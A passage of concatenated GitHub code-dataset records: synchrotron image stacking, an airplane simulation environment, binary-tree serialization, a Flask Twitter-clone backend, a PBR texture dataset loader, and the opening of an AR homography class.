list(set(dates_samples_energies_jjs))\n        for date_sample_energy_jj in dates_samples_energies_jjs:\n            date = date_sample_energy_jj[0]\n            sample = date_sample_energy_jj[1]\n            energy = date_sample_energy_jj[2]\n            jj_offset = date_sample_energy_jj[3]\n\n            # Raw image records by given date, sample and energy\n            query_cmd = ((files_query.date == date) &\n                         (files_query.sample == sample) &\n                         (files_query.energy == energy) &\n                         (files_query.jj_offset == jj_offset))\n            h5_records = file_index_db.search(query_cmd)\n            h5_records = sorted(h5_records, key=itemgetter('angle'))\n            data_files = get_file_paths(h5_records, root_path,\n                                        use_subfolders=subfolders)\n            files_dict = {\"data\": data_files, \"date\": date, \"sample\": sample,\n                          \"energy\": energy, \"jj_offset\": jj_offset}\n            files_list.append(files_dict)\n    elif type_struct == \"normalized_spectroscopy\":\n        dates_samples = []\n        for record in all_file_records:\n            dates_samples.append((record[\"date\"],\n                                  record[\"sample\"]))\n        dates_samples = list(set(dates_samples))\n        for date_sample in dates_samples:\n            date = date_sample[0]\n            sample = date_sample[1]\n\n            # Query building parts\n            da = (files_query.date == date)\n            sa = (files_query.sample == sample)\n\n            # Query command\n            query_cmd = (da & sa)\n            h5_records = file_index_db.search(query_cmd)\n            h5_records = sorted(h5_records, key=itemgetter('energy'))\n\n            data_files = get_file_paths(h5_records, root_path,\n                                        use_subfolders=subfolders)\n            files_dict = {\"data\": data_files, \"date\": date, \"sample\": sample}\n            files_list.append(files_dict)\n\n    # Parallelization of making the stacks\n    records = Parallel(n_jobs=cores, backend=\"multiprocessing\")(\n        delayed(make_stack)(files_for_stack, root_path,\n                            type_struct=type_struct, suffix=suffix\n                            ) for files_for_stack in files_list)\n\n    stack_table.insert_multiple(records)\n    pretty_printer = pprint.PrettyPrinter(indent=4)\n    print(\"Created stacks:\")\n    for record in stack_table.all():\n        pretty_printer.pprint(record[\"filename\"])\n    db.close()\n\n    print(\"--- Individual images to stacks took %s seconds ---\\n\" %\n          (time.time() - start_time))\n\n\ndef main():\n\n    file_index = \"/home/mrosanes/TOT/BEAMLINES/MISTRAL/DATA/\" \\\n                 \"PARALLEL_IMAGING/PARALLEL_XRM2H5/TOMOFEW/tomo_few_2/\" \\\n                 \"index.json\"\n\n    db = TinyDB(file_index)\n    a = db.table(\"hdf5_proc\")\n    print(a.all())\n\n    #many_images_to_h5_stack(file_index, type_struct=\"normalized\")\n\n    many_images_to_h5_stack(file_index, table_name=\"hdf5_averages\",\n                            type_struct=\"normalized\")\n\n\nif __name__ == \"__main__\":\n    main()\n\n\n","repo_name":"ALBA-Synchrotron/bl09-imaging","sub_path":"txm2nexuslib/images/imagestostack.py","file_name":"imagestostack.py","file_ext":"py","file_size_in_byte":19704,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"24579692858","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef _pi_bound_deg(u):\r\n    u_sat = np.mod(u, 360)\r\n\r\n    if u_sat > 180:\r\n        y = u_sat - 360\r\n    else:\r\n        y = u_sat\r\n\r\n    return y\r\n\r\n\r\nclass ACEnvironment2D:\r\n    _pos_m = None\r\n    _pos_history = None\r\n    _vel_mps = None # Velocity\r\n\r\n    _bank_rad = None # Bank angle , radians\r\n    _flightpath_rad = None # flight path angle , radians\r\n    _heading_rad = None # heading angle , radians\r\n\r\n    _cmd_bank_rad = None\r\n    _cmd_flightpath_rad = None\r\n    _cmd_vel_mps = None\r\n\r\n    _tau_bank_s = None\r\n    _tau_flightpath_s = None\r\n    _tau_vel_s = None\r\n\r\n    _dt = 0.05 # seconds\r\n    _t = 0.\r\n\r\n    def __init__(self, position=None,
\r\n                 heading_deg=0.,\r\n                 vel_mps=0):\r\n\r\n        self.reset()\r\n        if position is None:\r\n            # build the default here so instances do not share one mutable default array\r\n            position = np.array([0., 0., 0.])\r\n        self._pos_m = position\r\n        self._pos_history[0, :] = position\r\n        self._heading_rad = np.deg2rad(heading_deg)\r\n        self._vel_mps = vel_mps\r\n\r\n    def reset(self):\r\n        self._pos_m = np.zeros((1, 3), dtype=float) # pos X,Y,Z\r\n        self._pos_history = np.zeros((1, 3), dtype=float) # pos X,Y,Z\r\n        self._vel_mps = 0.\r\n\r\n        self._bank_rad = 0.\r\n        self._flightpath_rad = 0.\r\n        self._heading_rad = 0.\r\n\r\n        self._cmd_vel_mps = 0.\r\n        self._cmd_flightpath_rad = 0.\r\n        self._cmd_bank_rad = 0.\r\n\r\n        self._tau_bank_s = 0.05\r\n        self._tau_flightpath_s = 0.05\r\n        self._tau_vel_s = 1.5\r\n\r\n        self._t = 0.\r\n\r\n    def get_sta(self):\r\n\r\n        return np.array([self._pos_m.copy(),\r\n                         self._vel_mps,\r\n                         np.array([self._bank_rad, self._flightpath_rad, self._heading_rad], dtype=object),\r\n                         self._pos_history], dtype=object)\r\n\r\n    def set_cmd_bank(self, cmd_deg):\r\n        self._cmd_bank_rad = np.deg2rad(_pi_bound_deg(cmd_deg))\r\n\r\n    def set_cmd_flightpath(self, flightpath_deg):\r\n        self._cmd_flightpath_rad = np.deg2rad(_pi_bound_deg(flightpath_deg))\r\n\r\n    def set_cmd_vel(self, cmd_mps):\r\n        if cmd_mps < 0:\r\n            cmd_mps = 0\r\n\r\n        self._cmd_vel_mps = cmd_mps\r\n\r\n    def simfor(self, Time_s):\r\n\r\n        startTime = self._t\r\n        while self._t < (startTime + Time_s):\r\n\r\n            vx = self._vel_mps * np.cos(self._flightpath_rad) * np.cos(self._heading_rad)\r\n            vy = self._vel_mps * np.cos(self._flightpath_rad) * np.sin(self._heading_rad)\r\n            vz = -self._vel_mps * np.sin(self._flightpath_rad)\r\n\r\n            self._pos_m[0] = self._pos_m[0] + self._dt * vx\r\n            self._pos_m[1] = self._pos_m[1] + self._dt * vy\r\n            self._pos_m[2] = self._pos_m[2] + self._dt * vz\r\n\r\n            if self._vel_mps > 0: # update heading only when there is velocity, otherwise we would divide by zero\r\n                heading_dot_rad = 9.81 / self._vel_mps * np.tan(self._bank_rad) * np.cos(self._flightpath_rad)\r\n            else:\r\n                heading_dot_rad = 0\r\n            bank_dot = (self._cmd_bank_rad - self._bank_rad) / self._tau_bank_s\r\n            flightpath_dot = (self._cmd_flightpath_rad - self._flightpath_rad) / self._tau_flightpath_s\r\n            vel_dot = (self._cmd_vel_mps - self._vel_mps) / self._tau_vel_s\r\n\r\n            self._bank_rad += self._dt * bank_dot\r\n            self._flightpath_rad += self._dt * flightpath_dot\r\n            self._heading_rad += self._dt * heading_dot_rad\r\n            self._vel_mps += self._dt * vel_dot\r\n\r\n            self._pos_history = np.append( self._pos_history, [self._pos_m], axis=0 )\r\n            #self._pos_history = np.concatenate((self._pos_history, self._pos_m), axis=0)\r\n\r\n            self._t += self._dt\r\n\r\n        return np.array([self._pos_m.copy(),\r\n                         self._vel_mps,\r\n                         np.array([self._bank_rad, self._flightpath_rad, self._heading_rad], dtype=object),\r\n                         self._pos_history], dtype=object)\r\n\r\n    def sim(self, simTime_s):\r\n\r\n        self.reset()\r\n        return self.simfor(simTime_s)\r\n\r\n    def takeaction(self, cmd_bank_deg, cmd_flightpath, cmd_vel_mps, actiontime=1):\r\n\r\n        self.set_cmd_bank(cmd_bank_deg)\r\n        self.set_cmd_flightpath(cmd_flightpath)\r\n        self.set_cmd_vel(cmd_vel_mps)\r\n\r\n        return self.simfor(actiontime) # simulate for actiontime seconds to get the results of the action\r\n","repo_name":"hasanisci/gym-dubins-ac","sub_path":"gym-dubins-airplane/gym_dubins_airplane/envs/ACEnvironment.py","file_name":"ACEnvironment.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
+{"seq_id":"9529839388","text":"'''\nPreorder traversal (DLR): root node -> left subtree -> right subtree\nInorder traversal (LDR): left subtree -> root node -> right subtree\nPostorder traversal (LRD): left subtree -> right subtree -> root node\nLevel-order traversal: when a binary tree is stored in a one-dimensional array, the nodes are always stored in level order. Level-order traversal should use a queue.\n\n'''\n\nclass Node():\n    def __init__(self, root=None, left=None, right=None):\n        self.__root = root\n        self.__left = left\n        self.__right = right\n\n    @property\n    def root(self):\n        return self.__root\n\n    @property\n    def left(self):\n        return self.__left\n\n    @property\n    def right(self):\n        return self.__right\n\n\nclass TreeTraverse():\n    def _pre(self, tree):\n        if not tree:\n            return '#_'\n        res = tree.root + '_'\n        res += self._pre(tree.left)\n        res += self._pre(tree.right)\n        return res\n\n    def _rec(self, tree_string):\n        def _rec_str(value):\n            print(value)\n            key = value.pop(0)\n            if key == '#':\n                return None\n            root = Node(key, _rec_str(value), _rec_str(value))\n            return root\n\n        value = tree_string.split('_')\n        return _rec_str(value)\n\n\nif __name__ == '__main__':\n    '''\n            A\n           / \\\n          B   C\n         / \\   \\\n        D   E   F\n               /\n              G\n    Recursion trace: ABDDDBEEEBACCFGGGFFCA\n    Preorder: print each element on its first visit -> ABDECFG\n    Inorder: print each element on its second visit -> DBEACGF\n    Postorder: print each element on its third visit -> DEBGFCA\n    '''\n    ct = Node('A',Node('B',Node('D'),Node('E')),Node('C',right=Node('F',Node('G'))))\n    print('Preorder --->')\n    tt = TreeTraverse()\n    print(tt._pre(ct))\n    cct = tt._rec('A_B_D_#_#_E_#_#_C_#_F_G_#_#_#_')\n","repo_name":"imlifeilong/MyAlgorithm","sub_path":"basic/二叉树/二叉树-序列化反序列化.py","file_name":"二叉树-序列化反序列化.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"28609611359","text":"from flask import Flask, request, jsonify, current_app\nfrom flask.json import JSONEncoder\nfrom sqlalchemy import create_engine, text\n\n## The default JSON encoder cannot serialize a set,\n## so we write a custom encoder that converts sets to lists\n## before they are serialized to JSON.\nclass CustomJSONEncoder(JSONEncoder):\n    def default(self, obj):\n        if isinstance(obj, set):\n            return list(obj)\n\n        return JSONEncoder.default(self, obj)\n\ndef get_user(user_id):\n    user = current_app.database.execute(text(\"\"\"\n        SELECT \n            id,\n            name,\n            email,\n            profile\n        FROM users\n        WHERE id = :user_id\n    \"\"\"), {\n        'user_id' : user_id \n    }).fetchone()\n\n    return {\n        'id' : user['id'],\n        'name' : user['name'],\n        'email' : user['email'],\n        'profile' : user['profile']\n    } if user else None\n\ndef insert_user(user):\n    return current_app.database.execute(text(\"\"\"\n        INSERT INTO users (\n            name,\n            email,\n            profile,\n            hashed_password\n        ) VALUES (\n            :name,\n            :email,\n            :profile,\n            :password\n        )\n    \"\"\"), user).lastrowid\n\ndef insert_tweet(user_tweet):\n    return current_app.database.execute(text(\"\"\"\n        INSERT INTO tweets (\n            user_id,\n            tweet\n        ) VALUES (\n            :id,\n            :tweet\n        )\n    \"\"\"), user_tweet).rowcount\n\ndef insert_follow(user_follow):\n    return current_app.database.execute(text(\"\"\"\n        INSERT INTO users_follow_list (\n            user_id,\n            follow_user_id\n        ) VALUES (\n            :id,\n            :follow\n        )\n    \"\"\"), user_follow).rowcount\n\ndef insert_unfollow(user_unfollow):\n    return current_app.database.execute(text(\"\"\"\n        DELETE FROM users_follow_list\n        WHERE user_id = :id\n        AND follow_user_id = :unfollow\n    \"\"\"), user_unfollow).rowcount\n\ndef get_timeline(user_id):\n    timeline = current_app.database.execute(text(\"\"\"\n        SELECT \n            t.user_id,\n            t.tweet\n        FROM tweets t\n        LEFT JOIN users_follow_list ufl ON ufl.user_id = :user_id\n        WHERE t.user_id = :user_id \n        OR t.user_id = ufl.follow_user_id\n    \"\"\"), {\n        'user_id' : user_id \n    }).fetchall()\n\n    return [{\n        'user_id' : tweet['user_id'],\n        'tweet' : tweet['tweet']\n    } for tweet in 
timeline]\n\ndef create_app(test_config = None):\n    app = Flask(__name__)\n\n    app.json_encoder = CustomJSONEncoder\n\n    if test_config is None:\n        app.config.from_pyfile(\"config.py\")\n    else:\n        app.config.update(test_config)\n\n    database = create_engine(app.config['DB_URL'], encoding = 'utf-8', max_overflow = 0)\n    app.database = database\n\n    @app.route(\"/ping\", methods=['GET'])\n    def ping():\n        return \"pong\"\n\n    @app.route(\"/sign-up\", methods=['POST'])\n    def sign_up():\n        new_user = request.json\n        new_user_id = insert_user(new_user)\n        new_user = get_user(new_user_id)\n\n        return jsonify(new_user)\n\n    @app.route('/tweet', methods=['POST'])\n    def tweet():\n        user_tweet = request.json\n        tweet = user_tweet['tweet']\n\n        if len(tweet) > 300:\n            return 'The tweet exceeds 300 characters', 400\n\n        insert_tweet(user_tweet)\n\n        return '', 200\n\n    @app.route('/follow', methods=['POST'])\n    def follow():\n        payload = request.json\n        insert_follow(payload) \n\n        return '', 200\n\n    @app.route('/unfollow', methods=['POST'])\n    def unfollow():\n        payload = request.json\n        insert_unfollow(payload)\n\n        return '', 200\n\n    @app.route('/timeline/<int:user_id>', methods=['GET'])\n    def timeline(user_id):\n        return jsonify({\n            'user_id' : user_id,\n            'timeline' : get_timeline(user_id)\n        })\n\n    return app\n\n","repo_name":"rampart81/python-backend-book","sub_path":"chapter6/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"32"}
+{"seq_id":"5463199703","text":"import os.path\n# import glob\nimport random\nimport numpy as np\nimport cv2\nimport torch\n# import torch.utils.data as data\nfrom torch.utils.data.dataset import Dataset\nimport dataops.common as util\n\n# import dataops.augmentations as augmentations #TMP\nfrom dataops.augmentations import Scale, NoisePatches, RandomNoisePatches, get_blur, get_noise, get_pad\nfrom dataops.debug import tmp_vis, describe_numpy, describe_tensor\n\nimport dataops.augmennt.augmennt as transforms\n\n\n\nclass LRHRDataset(Dataset):\n    '''\n    Read PBR images.\n    '''\n\n    def __init__(self, opt):\n        super(LRHRDataset, self).__init__()\n        self.opt = opt\n        self.paths_LR, self.paths_HR = None, None\n        self.output_sample_imgs = None\n\n        if opt.get('dataroot_kernels', None) and 999 in opt[\"lr_downscale_types\"]:\n            self.ds_kernels = transforms.ApplyKernel(\n                scale=opt.get('scale', 4), kernels_path=opt['dataroot_kernels'], pattern='kernelgan')\n        else:\n            self.ds_kernels = None\n\n        if opt['phase'] == 'train' and opt.get('lr_noise_types', 3) and \"patches\" in opt['lr_noise_types']:\n            assert opt['noise_data']\n            self.noise_patches = NoisePatches(opt['noise_data'], opt.get('HR_size', 128)/opt.get('scale', 4))\n        else:\n            self.noise_patches = None\n\n        # Get dataroot_HR\n        self.paths_HR = opt.get('dataroot_HR', None)\n        if self.paths_HR:\n            # self.pbr_list = os.listdir(self.paths_HR)\n            # print(self.paths_HR)\n            self.pbr_list = []\n            for root,dirs,files in os.walk(self.paths_HR):\n                if files and not dirs:\n                    self.pbr_list.append(root)\n            # print(self.pbr_list)\n        \n        # Get dataroot_LR\n        self.paths_LR = opt.get('dataroot_LR', None)\n\n    def __getitem__(self, index):\n        HR_path, LR_path = None, None\n        scale = self.opt.get('scale', 4)\n        HR_size = self.opt.get('HR_size', 128)\n        if HR_size:\n            LR_size = HR_size // scale\n        \n        # Default case: tensor will result in the [0,1] range\n        # Alternative: tensor will be z-normalized to the [-1,1] range\n        znorm = self.opt.get('znorm', False)\n\n        # get a random pbr directory\n        # idx_pbr = random.randint(0, 
len(self.pbr_list)-1)\n # pbr_dir = self.pbr_list[idx_pbr]\n pbr_dir = self.pbr_list[index]\n # print(pbr_dir)\n\n #TODO: TMP os problem\n # import os\n # cur_dir = os.path.join(self.paths_HR, pbr_dir)\n cur_dir = pbr_dir\n dir_content = os.listdir(cur_dir)\n # print(dir_content)\n\n ######## Read the images ########\n diffuse_img = None\n albedo_img = None\n ao_img = None\n glossiness_img = None\n height_img = None\n metalness_img = None\n normal_img = None\n reflection_img = None\n roughness_img = None\n\n for source in dir_content:\n #TODO: handle uppercase names\n source = source.lower()\n #ref: https://marmoset.co/posts/pbr-texture-conversion/\n if source.find('_diffuse.') >= 0 or source.find('_color.') >= 0:\n diffuse_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=3)\n if self.paths_LR:\n cur_dir_lr = os.path.join(self.paths_LR, pbr_dir)\n diffuse_img_lr = util.read_img(None, os.path.join(cur_dir_lr, source), out_nc=3)\n else:\n diffuse_img_lr = diffuse_img\n elif source.find('_albedo.') >= 0:\n albedo_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=3)\n elif source.find('_ao.') >= 0 or source.find('_occlusion.') >= 0 or source.find('_ambientocclusion.') >= 0:\n ao_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n elif source.find('_height.') >= 0 or source.find('_displacement.') >= 0 or source.find('_bump.') >= 0:\n height_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n elif source.find('_metalness.') >= 0:\n metalness_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n elif source.find('_normal.') >= 0:\n normal_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=3)\n elif source.find('_reflection.') >= 0:\n reflection_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n elif source.find('_roughness.') >= 0:\n roughness_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n elif source.find('_glossiness.') >= 0 and not isinstance(roughness_img, np.ndarray):\n # glossiness_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n roughness_img = 255 - util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n \n # if isinstance(albedo_img, np.ndarray) and isinstance(ao_img, np.ndarray) and not isinstance(diffuse_img, np.ndarray):\n # diffuse_img = albedo_img - (255 - ao_img)\n # diffuse_img_lr = diffuse_img\n if isinstance(albedo_img, np.ndarray) and not isinstance(diffuse_img, np.ndarray):\n diffuse_img = albedo_img\n diffuse_img_lr = diffuse_img\n albedo_img = None\n\n # if isinstance(diffuse_img, np.ndarray):\n # tmp_vis(diffuse_img, False)\n # if isinstance(diffuse_img_lr, np.ndarray):\n # tmp_vis(diffuse_img_lr, False)\n # if isinstance(albedo_img, np.ndarray):\n # tmp_vis(albedo_img, False)\n # if isinstance(ao_img, np.ndarray):\n # tmp_vis(ao_img, False)\n # if isinstance(height_img, np.ndarray):\n # tmp_vis(height_img, False)\n # if isinstance(metalness_img, np.ndarray):\n # tmp_vis(metalness_img, False)\n # if isinstance(normal_img, np.ndarray):\n # tmp_vis(normal_img, False)\n # if isinstance(reflection_img, np.ndarray):\n # tmp_vis(reflection_img, False)\n # if isinstance(roughness_img, np.ndarray):\n # tmp_vis(roughness_img, False)\n \n ######## Modify the images ########\n \n # HR modcrop in the validation / test phase\n # if self.opt['phase'] != 'train':\n # img_HR = util.modcrop(img_HR, scale)\n \n ######## Augmentations ########\n \n #Augmentations during training\n if self.opt['phase'] == 'train':\n \n # Or if the HR 
images are too small, fix to the HR_size size and fit LR pair to LR_size too\n dim_change = self.opt.get('dim_change', 'pad')\n if diffuse_img.shape[0] < HR_size or diffuse_img.shape[1] < HR_size:\n if dim_change == \"resize\":\n # rescale HR image to the HR_size \n diffuse_img = transforms.Resize((HR_size, HR_size), interpolation=\"BILINEAR\")(np.copy(diffuse_img))\n # rescale LR image to the LR_size (The original code discarded the diffuse_img_lr and generated a new one on the fly from diffuse_img)\n diffuse_img_lr = transforms.Resize((LR_size, LR_size), interpolation=\"BILINEAR\")(np.copy(diffuse_img_lr))\n elif dim_change == \"pad\":\n # if diffuse_img_lr is diffuse_img, padding will be wrong, downscaling LR before padding\n if diffuse_img_lr.shape[0] != diffuse_img.shape[0]//scale or diffuse_img_lr.shape[1] != diffuse_img.shape[1]//scale:\n ds_algo = 777 # default to matlab-like bicubic downscale\n if self.opt.get('lr_downscale', None): # if manually set and scale algorithms are provided, then:\n ds_algo = self.opt.get('lr_downscale_types', 777)\n if self.opt.get('lr_downscale', None) and self.opt.get('dataroot_kernels', None) and 999 in self.opt[\"lr_downscale_types\"]:\n ds_kernel = self.ds_kernels\n else:\n ds_kernel = None\n diffuse_img_lr, _ = Scale(img=diffuse_img_lr, scale=scale, algo=ds_algo, ds_kernel=ds_kernel)\n \n HR_pad, fill = get_pad(diffuse_img, HR_size, fill='random', padding_mode=self.opt.get('pad_mode', 'constant'))\n diffuse_img = HR_pad(np.copy(diffuse_img))\n \n LR_pad, _ = get_pad(diffuse_img_lr, HR_size//scale, fill=fill, padding_mode=self.opt.get('pad_mode', 'constant'))\n diffuse_img_lr = LR_pad(np.copy(diffuse_img_lr))\n \n # (Randomly) scale LR (from HR) during training if :\n # - LR dataset is not provided\n # - LR dataset is not in the correct scale\n # - Also to check if LR is not at the correct scale already (if img_LR was changed to img_HR)\n if diffuse_img_lr.shape[0] != LR_size or diffuse_img_lr.shape[1] != LR_size:\n ds_algo = 777 # default to matlab-like bicubic downscale\n if self.opt.get('lr_downscale', None): # if manually set and scale algorithms are provided, then:\n ds_algo = self.opt.get('lr_downscale_types', 777)\n else: # else, if for some reason diffuse_img_lr is too large, default to matlab-like bicubic downscale\n #if not self.opt['aug_downscale']: #only print the warning if not being forced to use HR images instead of LR dataset (which is a known case)\n print(\"LR image is too large, auto generating new LR for: \", LR_path)\n if self.opt.get('lr_downscale', None) and self.opt.get('dataroot_kernels', None) and 999 in self.opt[\"lr_downscale_types\"]:\n ds_kernel = self.ds_kernels #KernelDownscale(scale, self.kernel_paths, self.num_kernel)\n else:\n ds_kernel = None\n diffuse_img_lr, _ = Scale(img=diffuse_img_lr, scale=scale, algo=ds_algo, ds_kernel=ds_kernel)\n\n # Random Crop (reduce computing cost and adjust images to correct size first)\n if diffuse_img.shape[0] > HR_size or diffuse_img.shape[1] > HR_size:\n #Here the scale should be in respect to the images, not to the training scale (in case they are being scaled on the fly)\n hr_crop_params, lr_crop_params = get_crop_params(diffuse_img, LR_size, scale)\n diffuse_img, _ = apply_crop_params(HR=diffuse_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n _, diffuse_img_lr = apply_crop_params(HR=None, LR=diffuse_img_lr, hr_crop_params=None, lr_crop_params=lr_crop_params)\n albedo_img, _ = apply_crop_params(HR=albedo_img, LR=None, hr_crop_params=hr_crop_params, 
lr_crop_params=None)\n ao_img, _ = apply_crop_params(HR=ao_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n height_img, _ = apply_crop_params(HR=height_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n metalness_img, _ = apply_crop_params(HR=metalness_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n normal_img, _ = apply_crop_params(HR=normal_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n reflection_img, _ = apply_crop_params(HR=reflection_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n roughness_img, _ = apply_crop_params(HR=roughness_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n\n # Below are the On The Fly augmentations\n \n # Apply unsharpening mask to HR images\n if self.opt.get('hr_unsharp_mask', None):\n hr_rand_unsharp = self.opt.get('hr_rand_unsharp', 0)\n diffuse_img_lr = transforms.FilterUnsharp(p=hr_rand_unsharp)(diffuse_img_lr)\n \n # Add blur if LR blur AND blur types are provided, else will skip\n if self.opt.get('lr_blur', None):\n blur_option = get_blur(self.opt.get('lr_blur_types', None))\n if blur_option:\n diffuse_img_lr = blur_option(diffuse_img_lr)\n \n # LR primary noise: Add noise to LR if enabled AND noise types are provided, else will skip\n if self.opt.get('lr_noise', None):\n noise_option = get_noise(self.opt.get('lr_noise_types', None), self.noise_patches)\n if noise_option:\n diffuse_img_lr = noise_option(diffuse_img_lr)\n\n # LR secondary noise: Add additional noise to LR if enabled AND noise types are provided, else will skip\n if self.opt.get('lr_noise2', None):\n noise_option = get_noise(self.opt.get('lr_noise_types2', None), self.noise_patches)\n if noise_option:\n diffuse_img_lr = noise_option(diffuse_img_lr)\n\n dataset_out = {}\n if isinstance(diffuse_img, np.ndarray):\n # tmp_vis(diffuse_img, False)\n diffuse_img = util.np2tensor(diffuse_img, normalize=znorm, add_batch=False)\n # tmp_vis(diffuse_img, True)\n dataset_out['HR'] = diffuse_img\n dataset_out['HR_path'] = cur_dir\n if isinstance(diffuse_img_lr, np.ndarray):\n # tmp_vis(diffuse_img, False)\n diffuse_img_lr = util.np2tensor(diffuse_img_lr, normalize=znorm, add_batch=False)\n # tmp_vis(diffuse_img, True)\n dataset_out['LR'] = diffuse_img_lr\n dataset_out['LR_path'] = cur_dir\n if isinstance(albedo_img, np.ndarray):\n # tmp_vis(albedo_img, False)\n albedo_img = util.np2tensor(albedo_img, normalize=znorm, add_batch=False)\n # tmp_vis(ao_img, True)\n dataset_out['AL'] = albedo_img\n if isinstance(ao_img, np.ndarray):\n # tmp_vis(ao_img, False)\n ao_img = util.np2tensor(ao_img, normalize=znorm, add_batch=False)\n # tmp_vis(ao_img, True)\n dataset_out['AO'] = ao_img\n if isinstance(height_img, np.ndarray):\n # tmp_vis(height_img, False)\n height_img = util.np2tensor(height_img, normalize=znorm, add_batch=False)\n dataset_out['HE'] = height_img\n if isinstance(metalness_img, np.ndarray):\n # tmp_vis(metalness_img, False)\n metalness_img = util.np2tensor(metalness_img, normalize=znorm, add_batch=False)\n dataset_out['ME'] = metalness_img\n if isinstance(normal_img, np.ndarray):\n # tmp_vis(normal_img, False)\n normal_img = util.np2tensor(normal_img, normalize=znorm, add_batch=False)\n dataset_out['NO'] = normal_img\n if isinstance(reflection_img, np.ndarray):\n # tmp_vis(reflection_img, False)\n reflection_img = util.np2tensor(reflection_img, normalize=znorm, add_batch=False)\n dataset_out['RE'] = reflection_img\n if isinstance(roughness_img, np.ndarray):\n # tmp_vis(roughness_img, 
False)\n            roughness_img = util.np2tensor(roughness_img, normalize=znorm, add_batch=False)\n            dataset_out['RO'] = roughness_img\n\n        return dataset_out\n\n    def __len__(self):\n        return len(self.pbr_list)\n\n\ndef get_crop_params(img, patch_size_lr, scale):\n    h_hr, w_hr, _ = img.shape\n    h_lr = h_hr // scale\n    w_lr = w_hr // scale\n    idx_h = random.randint(10, h_lr - patch_size_lr - 10)\n    idx_w = random.randint(10, w_lr - patch_size_lr - 10)\n\n    h_start_hr = (idx_h - 1) * scale\n    h_end_hr = (idx_h - 1 + patch_size_lr) * scale\n    w_start_hr = (idx_w - 1) * scale\n    w_end_hr = (idx_w - 1 + patch_size_lr) * scale\n\n    h_start_lr = idx_h - 1\n    h_end_lr = idx_h - 1 + patch_size_lr\n    w_start_lr = idx_w - 1\n    w_end_lr = idx_w - 1 + patch_size_lr\n    \n    hr_crop_params = [h_start_hr, h_end_hr, w_start_hr, w_end_hr]\n    lr_crop_params = [h_start_lr, h_end_lr, w_start_lr, w_end_lr]\n    \n    return hr_crop_params, lr_crop_params\n\ndef apply_crop_params(HR=None, LR=None, hr_crop_params=None, lr_crop_params=None):\n    if isinstance(HR, np.ndarray) and hr_crop_params:\n        (h_start_hr, h_end_hr, w_start_hr, w_end_hr) = hr_crop_params\n        HR = HR[h_start_hr:h_end_hr, w_start_hr:w_end_hr]\n    else:\n        HR = None\n    \n    if isinstance(LR, np.ndarray) and lr_crop_params:\n        (h_start_lr, h_end_lr, w_start_lr, w_end_lr) = lr_crop_params\n        LR = LR[h_start_lr:h_end_lr, w_start_lr:w_end_lr]\n    else:\n        LR = None\n    \n    return HR, LR","repo_name":"victorca25/traiNNer","sub_path":"codes/data/LRHRPBR_dataset.py","file_name":"LRHRPBR_dataset.py","file_ext":"py","file_size_in_byte":16719,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"32"}
+{"seq_id":"39748008278","text":"from unittest import skip\nimport numpy as np\nfrom numpy import linalg as LA\nfrom scipy import fftpack\nimport matplotlib.pyplot as plt\nimport cv2\nimport math\nfrom PIL import Image as im\nfrom numpy.linalg import inv\n\nclass AR_Detect:\n    def __init__(self):\n        self.result = cv2.VideoWriter('filename.avi', \n                         cv2.VideoWriter_fourcc(*'MJPG'),\n                         10, (1920, 1080))\n\n    def gethomographyMat(self, cornerList, desiredCoordinates,img1):\n        A = np.array([[cornerList[0][0], cornerList[0][1], 1, 0, 0, 0, -cornerList[0][0]*desiredCoordinates[0][0], -cornerList[0][1]*desiredCoordinates[0][0], -desiredCoordinates[0][0]], \n                      [0, 0, 0, cornerList[0][0], cornerList[0][1], 1, -cornerList[0][0]*desiredCoordinates[0][1], -cornerList[0][1]*desiredCoordinates[0][1], -desiredCoordinates[0][1]],\n\n                      [cornerList[1][0], cornerList[1][1], 1, 0, 0, 0, -cornerList[1][0]*desiredCoordinates[1][0], -cornerList[1][1]*desiredCoordinates[1][0], -desiredCoordinates[1][0]],\n                      [0, 0, 0, cornerList[1][0], cornerList[1][1], 1, -cornerList[1][0]*desiredCoordinates[1][1], -cornerList[1][1]*desiredCoordinates[1][1], -desiredCoordinates[1][1]],\n                      \n                      [cornerList[2][0], cornerList[2][1], 1, 0, 0, 0, -cornerList[2][0]*desiredCoordinates[2][0], -cornerList[2][1]*desiredCoordinates[2][0], -desiredCoordinates[2][0]],\n                      [0, 0, 0, cornerList[2][0], cornerList[2][1], 1, -cornerList[2][0]*desiredCoordinates[2][1], -cornerList[2][1]*desiredCoordinates[2][1], -desiredCoordinates[2][1]],\n                      \n                      [cornerList[3][0], cornerList[3][1], 1, 0, 0, 0, -cornerList[3][0]*desiredCoordinates[3][0], -cornerList[3][1]*desiredCoordinates[3][0], -desiredCoordinates[3][0]],\n                      [0, 0, 0, cornerList[3][0], cornerList[3][1], 1, -cornerList[3][0]*desiredCoordinates[3][1], -cornerList[3][1]*desiredCoordinates[3][1], -desiredCoordinates[3][1]],\n                      \n                      ])\n        u, s, vh = np.linalg.svd(A)\n        homographyMat = np.reshape(vh[8], 
